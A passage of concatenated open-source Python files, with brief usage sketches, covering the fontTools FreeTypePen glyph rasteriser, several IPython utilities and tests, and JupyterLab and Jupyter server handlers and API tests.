for info, pos in zip(buf.glyph_infos, buf.glyph_positions):
gid = info.codepoint
transformed = TransformPen(pen, Offset(x + pos.x_offset, y + pos.y_offset))
font.draw_glyph_with_pen(gid, transformed)
x += pos.x_advance
y += pos.y_advance
offset, width, height = None, None, None
if direction in ('ltr', 'rtl'):
offset = (0, -typo_descender)
width = x
height = typo_ascender - typo_descender
else:
offset = (-vhea_descender, -y)
width = vhea_ascender - vhea_descender
height = -y
pen.show(width=width, height=height, transform=Offset(*offset), contain=contain)
For Jupyter Notebook, the rendered image will be displayed in a cell if
you replace ``show()`` with ``image()`` in the examples.
"""
def __init__(self, glyphSet):
BasePen.__init__(self, glyphSet)
self.contours = []
def outline(self, transform=None, evenOdd=False):
"""Converts the current contours to ``FT_Outline``.
Args:
transform: An optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
"""
transform = transform or Transform()
if not hasattr(transform, 'transformPoint'):
transform = Transform(*transform)
nContours = len(self.contours)
n_points = sum((len(contour.points) for contour in self.contours))
points = []
for contour in self.contours:
for point in contour.points:
point = transform.transformPoint(point)
points.append(FT_Vector(FT_Pos(otRound(point[0] * 64)), FT_Pos(otRound(point[1] * 64))))
tags = []
for contour in self.contours:
for tag in contour.tags:
tags.append(tag)
contours = []
contours_sum = 0
for contour in self.contours:
contours_sum += len(contour.points)
contours.append(contours_sum - 1)
flags = FT_OUTLINE_EVEN_ODD_FILL if evenOdd else FT_OUTLINE_NONE
return FT_Outline(
(ctypes.c_short)(nContours),
(ctypes.c_short)(n_points),
(FT_Vector * n_points)(*points),
(ctypes.c_ubyte * n_points)(*tags),
(ctypes.c_short * nContours)(*contours),
(ctypes.c_int)(flags)
)
def buffer(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Renders the current contours within a bitmap buffer.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: An optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A tuple of ``(buffer, size)``, where ``buffer`` is a ``bytes``
object of the resulting bitmap and ``size`` is a 2-tuple of its
dimension.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> buf, size = pen.buffer(width=500, height=1000)
>> type(buf), len(buf), size
(<class 'bytes'>, 500000, (500, 1000))
"""
transform = transform or Transform()
if not hasattr(transform, 'transformPoint'):
transform = Transform(*transform)
contain_x, contain_y = contain or width is None, contain or height is None
width, height = width or 0, height or 0
if contain_x or contain_y:
bbox = self.bbox
bbox = transform.transformPoints((bbox[0:2], bbox[2:4]))
bbox = (*bbox[0], *bbox[1])
bbox_size = bbox[2] - bbox[0], bbox[3] - bbox[1]
dx, dy = transform.dx, transform.dy
if contain_x:
dx = min(-dx, bbox[0]) * -1.0
width = max(width, bbox_size[0])
if contain_y:
dy = min(-dy, bbox[1]) * -1.0
height = max(height, bbox_size[1])
transform = Transform(*transform[:4], dx, dy)
width, height = math.ceil(width), math.ceil(height)
buf = ctypes.create_string_buffer(width * height)
bitmap = FT_Bitmap(
(ctypes.c_int)(height),
(ctypes.c_int)(width),
(ctypes.c_int)(width),
(ctypes.POINTER(ctypes.c_ubyte))(buf),
(ctypes.c_short)(256),
(ctypes.c_ubyte)(FT_PIXEL_MODE_GRAY),
(ctypes.c_char)(0),
(ctypes.c_void_p)(None)
)
outline = self.outline(transform=transform, evenOdd=evenOdd)
err = FT_Outline_Get_Bitmap(freetype.get_handle(), ctypes.byref(outline), ctypes.byref(bitmap))
if err != 0:
raise FT_Exception(err)
return buf.raw, (width, height)
def array(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Returns the rendered contours as a numpy array. Requires `numpy`.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: An optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A ``numpy.ndarray`` object with a shape of ``(height, width)``.
Each element takes a value in the range of ``[0.0, 1.0]``.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> arr = pen.array(width=500, height=1000)
>> type(arr), arr.shape
(<class 'numpy.ndarray'>, (1000, 500))
"""
import numpy as np
buf, size = self.buffer(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
return np.frombuffer(buf, 'B').reshape((size[1], size[0])) / 255.0
def show(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Plots the rendered contours with `pyplot`. Requires `numpy` and
`matplotlib`.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: An optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> pen.show(width=500, height=1000)
"""
from matplotlib import pyplot as plt
a = self.array(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
plt.imshow(a, cmap='gray_r', vmin=0, vmax=1)
plt.show()
def image(self, width=None, height=None, transform=None, contain=False, evenOdd=False):
"""Returns the rendered contours as a PIL image. Requires `Pillow`.
Can be used to display a glyph image in Jupyter Notebook.
Args:
width: Image width of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
height: Image height of the bitmap in pixels. If omitted, it
automatically fits to the bounding box of the contours.
transform: An optional 6-tuple containing an affine transformation,
or a ``Transform`` object from the ``fontTools.misc.transform``
module. The bitmap size is not affected by this matrix.
contain: If ``True``, the image size will be automatically expanded
so that it fits to the bounding box of the paths. Useful for
rendering glyphs with negative sidebearings without clipping.
evenOdd: Pass ``True`` for even-odd fill instead of non-zero.
Returns:
A ``PIL.image`` object. The image is filled in black with alpha
channel obtained from the rendered bitmap.
:Example:
.. code-block::
>> pen = FreeTypePen(None)
>> glyph.draw(pen)
>> img = pen.image(width=500, height=1000)
>> type(img), img.size
(<class 'PIL.Image.Image'>, (500, 1000))
"""
from PIL import Image
buf, size = self.buffer(width=width, height=height, transform=transform, contain=contain, evenOdd=evenOdd)
img = Image.new('L', size, 0)
img.putalpha(Image.frombuffer('L', size, buf))
return img
@property
def bbox(self):
"""Computes the exact bounding box of an outline.
Returns:
A tuple of ``(xMin, yMin, xMax, yMax)``.
"""
bbox = FT_BBox()
outline = self.outline()
FT_Outline_Get_BBox(ctypes.byref(outline), ctypes.byref(bbox))
return (bbox.xMin / 64.0, bbox.yMin / 64.0, bbox.xMax / 64.0, bbox.yMax / 64.0)
@property
def cbox(self):
"""Returns an outline's ‘control box’.
Returns:
A tuple of ``(xMin, yMin, xMax, yMax)``.
"""
cbox = FT_BBox()
outline = self.outline()
FT_Outline_Get_CBox(ctypes.byref(outline), ctypes.byref(cbox))
return (cbox.xMin / 64.0, cbox.yMin / 64.0, cbox.xMax / 64.0, cbox.yMax / 64.0)
def _moveTo(self, pt):
contour = Contour([], [])
self.contours.append(contour)
contour.points.append(pt)
contour.tags.append(LINE)
def _lineTo(self, pt):
contour = self.contours[-1]
contour.points.append(pt)
contour.tags.append(LINE)
def _curveToOne(self, p1, p2, p3):
t1, t2, t3 = OFFCURVE, OFFCURVE, CURVE
contour = self.contours[-1]
for p, t in ((p1, t1), (p2, t2), (p3, t3)):
contour.points.append(p)
contour.tags.append(t)
def _qCurveToOne(self, p1, p2):
t1, t2 = QOFFCURVE, QCURVE
contour = self.contours[-1]
for p, t in ((p1, t1), (p2, t2)):
contour.points.append(p)
contour.tags.append(t)
```
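The docstring examples above draw real glyphs; the pen can also be exercised with a hand-built path. A sketch (requires `freetype-py`; `numpy`, `matplotlib` and `Pillow` are only needed for `array()`, `show()` and `image()`):
```python
# Sketch: rasterize a simple square with FreeTypePen.
from fontTools.pens.freetypePen import FreeTypePen

pen = FreeTypePen(None)
pen.moveTo((10, 10))
pen.lineTo((90, 10))
pen.lineTo((90, 90))
pen.lineTo((10, 90))
pen.closePath()

buf, size = pen.buffer(width=100, height=100)
print(size, len(buf))    # (100, 100) 10000 -- one byte of coverage per pixel
print(pen.bbox)          # (10.0, 10.0, 90.0, 90.0)
# pen.array(), pen.show() and pen.image() render the same buffer via
# numpy, matplotlib and Pillow respectively.
```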
#### File: extensions/tests/test_storemagic.py
```python
import tempfile, os
from pathlib import Path
from traitlets.config.loader import Config
def setup_module():
ip.magic('load_ext storemagic')
def test_store_restore():
assert 'bar' not in ip.user_ns, "Error: some other test leaked `bar` in user_ns"
assert 'foo' not in ip.user_ns, "Error: some other test leaked `foo` in user_ns"
assert 'foobar' not in ip.user_ns, "Error: some other test leaked `foobar` in user_ns"
assert 'foobaz' not in ip.user_ns, "Error: some other test leaked `foobaz` in user_ns"
ip.user_ns['foo'] = 78
ip.magic('alias bar echo "hello"')
ip.user_ns['foobar'] = 79
ip.user_ns['foobaz'] = '80'
tmpd = tempfile.mkdtemp()
ip.magic('cd ' + tmpd)
ip.magic('store foo')
ip.magic('store bar')
ip.magic('store foobar foobaz')
# Check storing
assert ip.db["autorestore/foo"] == 78
assert "bar" in ip.db["stored_aliases"]
assert ip.db["autorestore/foobar"] == 79
assert ip.db["autorestore/foobaz"] == "80"
# Remove those items
ip.user_ns.pop('foo', None)
ip.user_ns.pop('foobar', None)
ip.user_ns.pop('foobaz', None)
ip.alias_manager.undefine_alias('bar')
ip.magic('cd -')
ip.user_ns['_dh'][:] = []
# Check restoring
ip.magic("store -r foo bar foobar foobaz")
assert ip.user_ns["foo"] == 78
assert ip.alias_manager.is_alias("bar")
assert ip.user_ns["foobar"] == 79
assert ip.user_ns["foobaz"] == "80"
ip.magic("store -r") # restores _dh too
assert any(Path(tmpd).samefile(p) for p in ip.user_ns["_dh"])
os.rmdir(tmpd)
def test_autorestore():
ip.user_ns['foo'] = 95
ip.magic('store foo')
del ip.user_ns['foo']
c = Config()
c.StoreMagics.autorestore = False
orig_config = ip.config
try:
ip.config = c
ip.extension_manager.reload_extension("storemagic")
assert "foo" not in ip.user_ns
c.StoreMagics.autorestore = True
ip.extension_manager.reload_extension("storemagic")
assert ip.user_ns["foo"] == 95
finally:
ip.config = orig_config
```
#### File: lib/tests/test_security.py
```python
from IPython.lib import passwd
from IPython.lib.security import passwd_check, salt_len
def test_passwd_structure():
p = passwd("passphrase")
algorithm, salt, hashed = p.split(":")
assert algorithm == "sha1"
assert len(salt) == salt_len
assert len(hashed) == 40
def test_roundtrip():
p = passwd("passphrase")
assert passwd_check(p, "passphrase") is True
def test_bad():
p = passwd('passphrase')
assert passwd_check(p, p) is False
assert passwd_check(p, "a:b:c:d") is False
assert passwd_check(p, "a:b") is False
def test_passwd_check_unicode():
# GH issue #4524
phash = u'sha1:23862bc21dd3:7a415a95ae4580582e314072143d9c382c491e4f'
assert passwd_check(phash, u"łe¶ŧ←↓→")
```
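The API under test is small enough to show directly; this is the helper historically used to generate password hashes for IPython/Jupyter configuration files. A minimal sketch:
```python
# Sketch: create a salted hash and verify a passphrase against it.
from IPython.lib import passwd
from IPython.lib.security import passwd_check

hashed = passwd("correct horse battery staple")
print(hashed.split(":")[0])   # hash algorithm prefix (sha1 in the tests above)
print(passwd_check(hashed, "correct horse battery staple"))  # True
print(passwd_check(hashed, "wrong guess"))                   # False
```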
#### File: IPython/testing/decorators.py
```python
import os
import shutil
import sys
import tempfile
import unittest
import warnings
from importlib import import_module
from decorator import decorator
# Expose the unittest-driven decorators
from .ipunittest import ipdoctest, ipdocstring
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
# Simple example of the basic idea
def as_unittest(func):
"""Decorator to make a simple function into a normal test via unittest."""
class Tester(unittest.TestCase):
def test(self):
func()
Tester.__name__ = func.__name__
return Tester
# Utility functions
def skipif(skip_condition, msg=None):
"""Make function raise SkipTest exception if skip_condition is true
Parameters
----------
skip_condition : bool or callable
Flag to determine whether to skip test. If the condition is a
callable, it is used at runtime to dynamically make the decision. This
is useful for tests that may require costly imports, to delay the cost
until the test suite is actually executed.
msg : string
Message to give on raising a SkipTest exception.
Returns
-------
decorator : function
Decorator, which, when applied to a function, causes SkipTest
to be raised when the skip_condition was True, and the function
to be called normally otherwise.
"""
if msg is None:
msg = "Test skipped due to test condition."
import pytest
assert isinstance(skip_condition, bool)
return pytest.mark.skipif(skip_condition, reason=msg)
# A version with the condition set to true, common case just to attach a message
# to a skip decorator
def skip(msg=None):
"""Decorator factory - mark a test function for skipping from test suite.
Parameters
----------
msg : string
Optional message to be added.
Returns
-------
decorator : function
Decorator, which, when applied to a function, causes SkipTest
to be raised, with the optional message added.
"""
if msg and not isinstance(msg, str):
raise ValueError('invalid object passed to `@skip` decorator, did you '
'mean `@skip()` with brackets?')
return skipif(True, msg)
def onlyif(condition, msg):
"""The reverse from skipif, see skipif for details."""
return skipif(not condition, msg)
#-----------------------------------------------------------------------------
# Utility functions for decorators
def module_not_available(module):
"""Can module be imported? Returns true if module does NOT import.
This is used to make a decorator to skip tests that require module to be
available, but delay the 'import numpy' to test execution time.
"""
try:
mod = import_module(module)
mod_not_avail = False
except ImportError:
mod_not_avail = True
return mod_not_avail
#-----------------------------------------------------------------------------
# Decorators for public use
# Decorators to skip certain tests on specific platforms.
skip_win32 = skipif(sys.platform == 'win32',
"This test does not run under Windows")
skip_linux = skipif(sys.platform.startswith('linux'),
"This test does not run under Linux")
skip_osx = skipif(sys.platform == 'darwin',"This test does not run under OS X")
# Decorators to skip tests if not on specific platforms.
skip_if_not_win32 = skipif(sys.platform != 'win32',
"This test only runs under Windows")
skip_if_not_linux = skipif(not sys.platform.startswith('linux'),
"This test only runs under Linux")
_x11_skip_cond = (sys.platform not in ('darwin', 'win32') and
os.environ.get('DISPLAY', '') == '')
_x11_skip_msg = "Skipped under *nix when X11/XOrg not available"
skip_if_no_x11 = skipif(_x11_skip_cond, _x11_skip_msg)
# Other skip decorators
# generic skip without module
skip_without = lambda mod: skipif(module_not_available(mod), "This test requires %s" % mod)
skipif_not_numpy = skip_without('numpy')
skipif_not_matplotlib = skip_without('matplotlib')
# A null 'decorator', useful to make more readable code that needs to pick
# between different decorators based on OS or other conditions
null_deco = lambda f: f
# Some tests only run where we can use unicode paths. Note that we can't just
# check os.path.supports_unicode_filenames, which is always False on Linux.
try:
f = tempfile.NamedTemporaryFile(prefix=u"tmp€")
except UnicodeEncodeError:
unicode_paths = False
else:
unicode_paths = True
f.close()
onlyif_unicode_paths = onlyif(unicode_paths, ("This test is only applicable "
"where we can use unicode in filenames."))
def onlyif_cmds_exist(*commands):
"""
Decorator to skip test when at least one of `commands` is not found.
"""
assert (
os.environ.get("IPTEST_WORKING_DIR", None) is None
), "iptest deprecated since IPython 8.0"
for cmd in commands:
reason = f"This test runs only if command '{cmd}' is installed"
if not shutil.which(cmd):
import pytest
return pytest.mark.skip(reason=reason)
return null_deco
```
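A short sketch of how the decorators above are applied in practice; the test bodies are illustrative, not real IPython tests:
```python
# Sketch: applying the skip decorators defined above to illustrative tests.
from IPython.testing import decorators as dec

@dec.skip_win32
def test_posix_only_behaviour():
    import pwd  # POSIX-only module
    assert hasattr(pwd, "getpwuid")

@dec.skipif_not_numpy
def test_needs_numpy():
    import numpy as np
    assert np.arange(3).sum() == 3

@dec.onlyif_cmds_exist("git")
def test_uses_git_cli():
    import subprocess
    subprocess.run(["git", "--version"], check=True)
```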
#### File: testing/plugin/simple.py
```python
def pyfunc():
"""Some pure python tests...
>>> pyfunc()
'pyfunc'
>>> import os
>>> 2+3
5
>>> for i in range(3):
... print(i, end=' ')
... print(i+1, end=' ')
...
0 1 1 2 2 3
"""
return 'pyfunc'
def ipyfunc():
"""Some IPython tests...
In [1]: ipyfunc()
Out[1]: 'ipyfunc'
In [2]: import os
In [3]: 2+3
Out[3]: 5
In [4]: for i in range(3):
...: print(i, end=' ')
...: print(i+1, end=' ')
...:
Out[4]: 0 1 1 2 2 3
"""
return "ipyfunc"
```
#### File: IPython/utils/sysinfo.py
```python
import os
import platform
import pprint
import sys
import subprocess
from IPython.core import release
from IPython.utils import _sysinfo, encoding
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
def pkg_commit_hash(pkg_path):
"""Get short form of commit hash given directory `pkg_path`
We get the commit hash from (in order of preference):
* IPython.utils._sysinfo.commit
* git output, if we are in a git repository
If these fail, we return a not-found placeholder tuple
Parameters
----------
pkg_path : str
directory containing package
only used for getting commit from active repo
Returns
-------
hash_from : str
Where we got the hash from - description
hash_str : str
short form of hash
"""
# Try and get commit from written commit text file
if _sysinfo.commit:
return "installation", _sysinfo.commit
# maybe we are in a repository
proc = subprocess.Popen('git rev-parse --short HEAD'.split(' '),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=pkg_path)
repo_commit, _ = proc.communicate()
if repo_commit:
return 'repository', repo_commit.strip().decode('ascii')
return '(none found)', '<not found>'
def pkg_info(pkg_path):
"""Return dict describing the context of this package
Parameters
----------
pkg_path : str
path containing __init__.py for package
Returns
-------
context : dict
with named parameters of interest
"""
src, hsh = pkg_commit_hash(pkg_path)
return dict(
ipython_version=release.version,
ipython_path=pkg_path,
commit_source=src,
commit_hash=hsh,
sys_version=sys.version,
sys_executable=sys.executable,
sys_platform=sys.platform,
platform=platform.platform(),
os_name=os.name,
default_encoding=encoding.DEFAULT_ENCODING,
)
def get_sys_info():
"""Return useful information about IPython and the system, as a dict."""
p = os.path
path = p.realpath(p.dirname(p.abspath(p.join(__file__, '..'))))
return pkg_info(path)
def sys_info():
"""Return useful information about IPython and the system, as a string.
Examples
--------
::
In [2]: print(sys_info())
{'commit_hash': '144fdae', # random
'commit_source': 'repository',
'ipython_path': '/home/fperez/usr/lib/python2.6/site-packages/IPython',
'ipython_version': '0.11.dev',
'os_name': 'posix',
'platform': 'Linux-2.6.35-22-generic-i686-with-Ubuntu-10.10-maverick',
'sys_executable': '/usr/bin/python',
'sys_platform': 'linux2',
'sys_version': '2.6.6 (r266:84292, Sep 15 2010, 15:52:39) \\n[GCC 4.4.5]'}
"""
return pprint.pformat(get_sys_info())
def num_cpus():
"""DEPRECATED
Return the effective number of CPUs in the system as an integer.
This cross-platform function makes an attempt at finding the total number of
available CPUs in the system, as returned by various underlying system and
python calls.
If it can't find a sensible answer, it returns 1 (though an error *may* make
it return a large positive number that's actually incorrect).
"""
import warnings
warnings.warn(
"`num_cpus` is deprecated since IPython 8.0. Use `os.cpu_count` instead.",
DeprecationWarning,
stacklevel=2,
)
return os.cpu_count() or 1
```
#### File: IPython/utils/terminal.py
```python
import os
import sys
import warnings
from shutil import get_terminal_size as _get_terminal_size
# This variable is part of the expected API of the module:
ignore_termtitle = True
if os.name == 'posix':
def _term_clear():
os.system('clear')
elif sys.platform == 'win32':
def _term_clear():
os.system('cls')
else:
def _term_clear():
pass
def toggle_set_term_title(val):
"""Control whether set_term_title is active or not.
set_term_title() allows writing to the console titlebar. In embedded
widgets this can cause problems, so this call can be used to toggle it on
or off as needed.
The default state of the module is for the function to be disabled.
Parameters
----------
val : bool
If True, set_term_title() actually writes to the terminal (using the
appropriate platform-specific module). If False, it is a no-op.
"""
global ignore_termtitle
ignore_termtitle = not(val)
def _set_term_title(*args,**kw):
"""Dummy no-op."""
pass
def _restore_term_title():
pass
def _set_term_title_xterm(title):
""" Change virtual terminal title in xterm-workalikes """
# save the current title to the xterm "stack"
sys.stdout.write('\033[22;0t')
sys.stdout.write('\033]0;%s\007' % title)
def _restore_term_title_xterm():
sys.stdout.write('\033[23;0t')
if os.name == 'posix':
TERM = os.environ.get('TERM','')
if TERM.startswith('xterm'):
_set_term_title = _set_term_title_xterm
_restore_term_title = _restore_term_title_xterm
elif sys.platform == 'win32':
try:
import ctypes
SetConsoleTitleW = ctypes.windll.kernel32.SetConsoleTitleW
SetConsoleTitleW.argtypes = [ctypes.c_wchar_p]
def _set_term_title(title):
"""Set terminal title using ctypes to access the Win32 APIs."""
SetConsoleTitleW(title)
except ImportError:
def _set_term_title(title):
"""Set terminal title using the 'title' command."""
global ignore_termtitle
try:
# Cannot be on network share when issuing system commands
curr = os.getcwd()
os.chdir("C:")
ret = os.system("title " + title)
finally:
os.chdir(curr)
if ret:
# non-zero return code signals error, don't try again
ignore_termtitle = True
def set_term_title(title):
"""Set terminal title using the necessary platform-dependent calls."""
if ignore_termtitle:
return
_set_term_title(title)
def restore_term_title():
"""Restore, if possible, terminal title to the original state"""
if ignore_termtitle:
return
_restore_term_title()
def freeze_term_title():
warnings.warn("This function is deprecated, use toggle_set_term_title()")
global ignore_termtitle
ignore_termtitle = True
def get_terminal_size(defaultx=80, defaulty=25):
return _get_terminal_size((defaultx, defaulty))
```
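Titlebar writing is disabled by default; a minimal sketch of the intended call sequence:
```python
# Sketch: terminal title writing is a no-op until explicitly enabled.
from IPython.utils import terminal

terminal.set_term_title("ignored")          # ignore_termtitle is True by default
terminal.toggle_set_term_title(True)
terminal.set_term_title("IPython: my-project")
# On xterm-compatible terminals the original title can be restored later:
terminal.restore_term_title()
print(terminal.get_terminal_size())         # falls back to (80, 25) if undetectable
```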
#### File: utils/tests/test_sysinfo.py
```python
import json
import pytest
from IPython.utils import sysinfo
def test_json_getsysinfo():
"""
test that it is easily jsonable and don't return bytes somewhere.
"""
json.dumps(sysinfo.get_sys_info())
def test_num_cpus():
with pytest.deprecated_call():
sysinfo.num_cpus()
```
#### File: site-packages/jupyterlab_server/settings_handler.py
```python
import json
from jsonschema import ValidationError
from jupyter_server.extension.handler import (
ExtensionHandlerJinjaMixin,
ExtensionHandlerMixin,
)
from tornado import web
from .settings_utils import SchemaHandler, get_settings, save_settings
from .translation_utils import DEFAULT_LOCALE, translator
class SettingsHandler(ExtensionHandlerMixin, ExtensionHandlerJinjaMixin, SchemaHandler):
def initialize(
self,
name,
app_settings_dir,
schemas_dir,
settings_dir,
labextensions_path,
**kwargs
):
SchemaHandler.initialize(
self, app_settings_dir, schemas_dir, settings_dir, labextensions_path
)
ExtensionHandlerMixin.initialize(self, name)
@web.authenticated
def get(self, schema_name=""):
"""Get setting(s)"""
# Needs to be updated here because the translator locale does not change when a new
# locale is set from the frontend
locale = self.get_current_locale()
translator.set_locale(locale)
result, warnings = get_settings(
self.app_settings_dir,
self.schemas_dir,
self.settings_dir,
labextensions_path=self.labextensions_path,
schema_name=schema_name,
overrides=self.overrides,
translator=translator.translate_schema
)
# Print all warnings.
for w in warnings:
if w:
self.log.warn(w)
return self.finish(json.dumps(result))
@web.authenticated
def put(self, schema_name):
"""Update a setting"""
overrides = self.overrides
schemas_dir = self.schemas_dir
settings_dir = self.settings_dir
settings_error = 'No current settings directory'
invalid_json_error = 'Failed parsing JSON payload: %s'
invalid_payload_format_error = 'Invalid format for JSON payload. Must be in the form {\'raw\': ...}'
validation_error = 'Failed validating input: %s'
if not settings_dir:
raise web.HTTPError(500, settings_error)
raw_payload = self.request.body.strip().decode('utf-8')
try:
raw_settings = json.loads(raw_payload)["raw"]
save_settings(
schemas_dir,
settings_dir,
schema_name,
raw_settings,
overrides,
self.labextensions_path,
)
except json.decoder.JSONDecodeError as e:
raise web.HTTPError(400, invalid_json_error % str(e))
except (KeyError, TypeError) as e:
raise web.HTTPError(400, invalid_payload_format_error)
except ValidationError as e:
raise web.HTTPError(400, validation_error % str(e))
self.set_status(204)
```
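The PUT handler above expects the body to be a JSON object with the raw settings text under a `"raw"` key. A hedged client-side sketch: the `/lab/api/settings/` prefix, schema id, and setting value are assumptions about a typical JupyterLab deployment and are not defined in this file, and the token is a placeholder.
```python
# Illustrative sketch only: URL prefix, schema id, setting and token are assumptions.
import json
import requests

base = "http://localhost:8888"
token = "REPLACE_WITH_SERVER_TOKEN"
schema = "@jupyterlab/apputils-extension:themes"

payload = {"raw": json.dumps({"theme": "JupyterLab Dark"})}
resp = requests.put(
    f"{base}/lab/api/settings/{schema}",
    headers={"Authorization": f"token {token}"},
    data=json.dumps(payload),
)
print(resp.status_code)   # the handler responds with 204 on success
```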
#### File: jupyterlab_server/tests/test_workspaces_api.py
```python
import json
import os
import pytest
import shutil
import tornado
from strict_rfc3339 import rfc3339_to_timestamp
from .utils import expected_http_error, maybe_patch_ioloop, big_unicode_string
from .utils import validate_request
maybe_patch_ioloop()
async def test_delete(jp_fetch, labserverapp):
orig = 'f/o/o'
copy = 'baz'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
validate_request(r)
res = r.body.decode()
data = json.loads(res)
data['metadata']['id'] = copy
r2 = await jp_fetch('lab', 'api', 'workspaces', copy,
method='PUT',
body=json.dumps(data))
assert r2.code == 204
r3 = await jp_fetch('lab', 'api', 'workspaces', copy,
method='DELETE',
)
assert r3.code == 204
async def test_get_non_existant(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r)
data = json.loads(r.body.decode())
r2 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data))
validate_request(r2)
r3 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r3)
data = json.loads(r3.body.decode())
first_metadata = data["metadata"]
first_created = rfc3339_to_timestamp(first_metadata['created'])
first_modified = rfc3339_to_timestamp(first_metadata['last_modified'])
r4 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data))
validate_request(r4)
r5 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r5)
data = json.loads(r5.body.decode())
second_metadata = data["metadata"]
second_created = rfc3339_to_timestamp(second_metadata['created'])
second_modified = rfc3339_to_timestamp(second_metadata['last_modified'])
assert first_created <= second_created
assert first_modified < second_modified
@pytest.mark.skipif(os.name == "nt", reason="Temporal failure on windows")
async def test_get(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r)
data = json.loads(r.body.decode())
metadata = data['metadata']
assert metadata['id'] == id
assert rfc3339_to_timestamp(metadata['created'])
assert rfc3339_to_timestamp(metadata['last_modified'])
r2 = await jp_fetch('lab', 'api', 'workspaces', id)
validate_request(r2)
data = json.loads(r.body.decode())
assert data['metadata']['id'] == id
async def test_listing(jp_fetch, labserverapp):
# ID fields are from workspaces/*.jupyterlab-workspace
listing = set(['foo', 'f/o/o/'])
r = await jp_fetch('lab', 'api', 'workspaces/')
validate_request(r)
res = r.body.decode()
data = json.loads(res)
output = set(data['workspaces']['ids'])
assert output == listing
async def test_listing_dates(jp_fetch, labserverapp):
r = await jp_fetch('lab', 'api', 'workspaces')
data = json.loads(r.body.decode())
values = data['workspaces']['values']
times = sum(
[
[ws['metadata'].get('last_modified'), ws['metadata'].get('created')]
for ws in values
],
[]
)
assert None not in times
[rfc3339_to_timestamp(t) for t in times]
async def test_put(jp_fetch, labserverapp):
id = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', id)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
data["metadata"]["big-unicode-string"] = big_unicode_string[::-1]
r2 = await jp_fetch('lab', 'api', 'workspaces', id,
method='PUT',
body=json.dumps(data)
)
assert r2.code == 204
async def test_bad_put(jp_fetch, labserverapp):
orig = 'foo'
copy = 'bar'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch('lab', 'api', 'workspaces', copy,
method='PUT',
body=json.dumps(data)
)
assert expected_http_error(e, 400)
async def test_blank_put(jp_fetch, labserverapp):
orig = 'foo'
r = await jp_fetch('lab', 'api', 'workspaces', orig)
assert r.code == 200
res = r.body.decode()
data = json.loads(res)
with pytest.raises(tornado.httpclient.HTTPClientError) as e:
await jp_fetch('lab', 'api', 'workspaces',
method='PUT',
body=json.dumps(data)
)
assert expected_http_error(e, 400)
```
#### File: jupyter_server/nbconvert/handlers.py
```python
import io
import os
import zipfile
from anyio.to_thread import run_sync
from ipython_genutils import text
from ipython_genutils.py3compat import cast_bytes
from nbformat import from_dict
from tornado import web
from tornado.log import app_log
from ..base.handlers import FilesRedirectHandler
from ..base.handlers import JupyterHandler
from ..base.handlers import path_regex
from jupyter_server.utils import ensure_async
def find_resource_files(output_files_dir):
files = []
for dirpath, dirnames, filenames in os.walk(output_files_dir):
files.extend([os.path.join(dirpath, f) for f in filenames])
return files
def respond_zip(handler, name, output, resources):
"""Zip up the output and resource files and respond with the zip file.
Returns True if it has served a zip file, False if there are no resource
files, in which case we serve the plain output file.
"""
# Check if we have resource files we need to zip
output_files = resources.get("outputs", None)
if not output_files:
return False
# Headers
zip_filename = os.path.splitext(name)[0] + ".zip"
handler.set_attachment_header(zip_filename)
handler.set_header("Content-Type", "application/zip")
handler.set_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
# Prepare the zip file
buffer = io.BytesIO()
zipf = zipfile.ZipFile(buffer, mode="w", compression=zipfile.ZIP_DEFLATED)
